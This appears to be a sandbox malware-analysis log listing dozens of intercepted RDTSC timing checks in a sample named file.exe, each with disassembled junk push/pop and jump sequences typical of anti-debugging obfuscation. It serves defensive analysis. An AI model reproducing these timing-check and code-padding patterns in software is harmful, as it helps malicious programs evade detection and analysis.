Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA0659 second address: FA065F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9FE4B second address: F9FE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFAACBEF8C6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9FE56 second address: F9FE7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAAD0A8F21h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA46BD second address: FA46E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAACBEF8D9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAAA02 second address: FAAA08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAAA08 second address: FAAA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAAA22 second address: FAAA4E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FFAAD0A8F27h 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FFAAD0A8F16h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAAFAC second address: FAAFB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB0EF second address: FAB114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAAD0A8F1Bh 0x00000009 pop edi 0x0000000a jmp 00007FFAAD0A8F25h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB279 second address: FAB287 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB70D second address: FAB713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB713 second address: FAB71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB71E second address: FAB725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB725 second address: FAB72F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFAACBEF8C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAB72F second address: FAB752 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFAAD0A8F16h 0x00000008 jmp 00007FFAAD0A8F25h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FABB88 second address: FABB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8CAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2F15C second address: F2F160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2F160 second address: F2F166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF404 second address: FAF40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAF40F second address: FAF413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7A7A0 second address: F7A7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7A7A4 second address: F5F9A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FFAACBEF8C8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 lea eax, dword ptr [ebp+1247F561h] 0x0000002b mov dword ptr [ebp+122D22C6h], ecx 0x00000031 push eax 0x00000032 jmp 00007FFAACBEF8D5h 0x00000037 mov dword ptr [esp], eax 0x0000003a jmp 00007FFAACBEF8CFh 0x0000003f call dword ptr [ebp+122D2435h] 0x00000045 push esi 0x00000046 pushad 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 jmp 00007FFAACBEF8D4h 0x0000004e jmp 00007FFAACBEF8CEh 0x00000053 popad 0x00000054 ja 00007FFAACBEF8CAh 0x0000005a pop esi 0x0000005b push eax 0x0000005c push edx 0x0000005d push edi 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7A9C8 second address: F7A9DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7AD7B second address: F7AD7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7AD7F second address: F7AD94 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 ja 00007FFAAD0A8F16h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7AD94 second address: F7AD98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7AE6F second address: F7AE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7AF58 second address: F7AF8A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFAACBEF8CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jl 00007FFAACBEF8C6h 0x00000014 jmp 00007FFAACBEF8D7h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7B130 second address: F7B136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7B136 second address: F7B13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7B13A second address: F7B13E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7B13E second address: F7B164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007FFAACBEF8D4h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7B164 second address: F7B1C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFAAD0A8F1Ch 0x0000000c jmp 00007FFAAD0A8F21h 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jng 00007FFAAD0A8F21h 0x0000001c jmp 00007FFAAD0A8F1Bh 0x00000021 js 00007FFAAD0A8F1Ch 0x00000027 jnc 00007FFAAD0A8F16h 0x0000002d popad 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push edi 0x00000035 jmp 00007FFAAD0A8F1Fh 0x0000003a pop edi 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7BAA5 second address: F60611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FFAACBEF8D0h 0x00000011 call dword ptr [ebp+122D3874h] 0x00000017 jnp 00007FFAACBEF900h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAFBBA second address: FAFBCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FFAAD0A8F16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB0003 second address: FB001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8D4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB289E second address: FB28AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FFAAD0A8F18h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB28AA second address: FB28AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB28AF second address: FB28C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFAAD0A8F16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FFAAD0A8F16h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8C60 second address: FB8C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBDFFA second address: FBE019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FFAAD0A8F23h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE019 second address: FBE049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8CCh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFAACBEF8CCh 0x00000014 push ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007FFAACBEF8CAh 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE4DF second address: FBE4E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE7C3 second address: FBE7C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEA90 second address: FBEA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEC17 second address: FBEC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFAACBEF8D5h 0x0000000b popad 0x0000000c jo 00007FFAACBEF8CEh 0x00000012 jnp 00007FFAACBEF8C6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEC41 second address: FBEC4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEC4A second address: FBEC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEC53 second address: FBEC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEDC4 second address: FBEDF5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAACBEF8EBh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEDF5 second address: FBEDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEF61 second address: FBEF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEF67 second address: FBEF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEF6B second address: FBEF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBEF6F second address: FBEF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAAD0A8F29h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC45A4 second address: FC45A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC45A8 second address: FC45B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC45B0 second address: FC45C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAACBEF8D0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC45C6 second address: FC45F3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFAAD0A8F16h 0x00000008 jmp 00007FFAAD0A8F26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FFAAD0A8F16h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC3BEB second address: FC3BFF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFAACBEF8C6h 0x00000008 jmp 00007FFAACBEF8CAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC492F second address: FC4948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F24h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4948 second address: FC4955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4AC4 second address: FC4AD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4AD3 second address: FC4AF1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAACBEF8C6h 0x00000008 js 00007FFAACBEF8C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007FFAACBEF8D2h 0x00000016 jnl 00007FFAACBEF8C6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4AF1 second address: FC4B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FFAAD0A8F24h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4B14 second address: FC4B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4B1A second address: FC4B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4B20 second address: FC4B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4C3D second address: FC4C51 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAAD0A8F16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FFAAD0A8F18h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC4C51 second address: FC4C88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jmp 00007FFAACBEF8D7h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop esi 0x00000014 jmp 00007FFAACBEF8CBh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC8242 second address: FC8246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC7CC0 second address: FC7CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007FFAACBEF8C6h 0x00000009 pop eax 0x0000000a jmp 00007FFAACBEF8CBh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007FFAACBEF8DCh 0x00000017 pushad 0x00000018 jne 00007FFAACBEF8C6h 0x0000001e push eax 0x0000001f pop eax 0x00000020 jp 00007FFAACBEF8C6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC7FC3 second address: FC7FC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCA826 second address: FCA830 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F378B0 second address: F378B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F378B6 second address: F378CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jns 00007FFAACBEF8C8h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007FFAACBEF8C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF49F second address: FCF4FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F20h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007FFAAD0A8F16h 0x00000014 pop esi 0x00000015 ja 00007FFAAD0A8F28h 0x0000001b jmp 00007FFAAD0A8F22h 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 jmp 00007FFAAD0A8F21h 0x00000028 js 00007FFAAD0A8F16h 0x0000002e popad 0x0000002f popad 0x00000030 jo 00007FFAAD0A8F1Eh 0x00000036 push ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF65B second address: FCF669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8CAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF669 second address: FCF679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF679 second address: FCF699 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FFAACBEF8CEh 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FFAACBEF8C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF699 second address: FCF69D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF69D second address: FCF6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFAACBEF8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jc 00007FFAACBEF8C6h 0x00000013 jnc 00007FFAACBEF8C6h 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF82E second address: FCF832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF832 second address: FCF857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FFAACBEF8E3h 0x0000000c jmp 00007FFAACBEF8D7h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD47F7 second address: FD47FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD47FB second address: FD4814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FFAACBEF8D1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD4969 second address: FD498E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FFAAD0A8F28h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD4C27 second address: FD4C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAACBEF8CFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD4C41 second address: FD4C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD4C45 second address: FD4C6C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFAACBEF8D8h 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD5047 second address: FD504B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
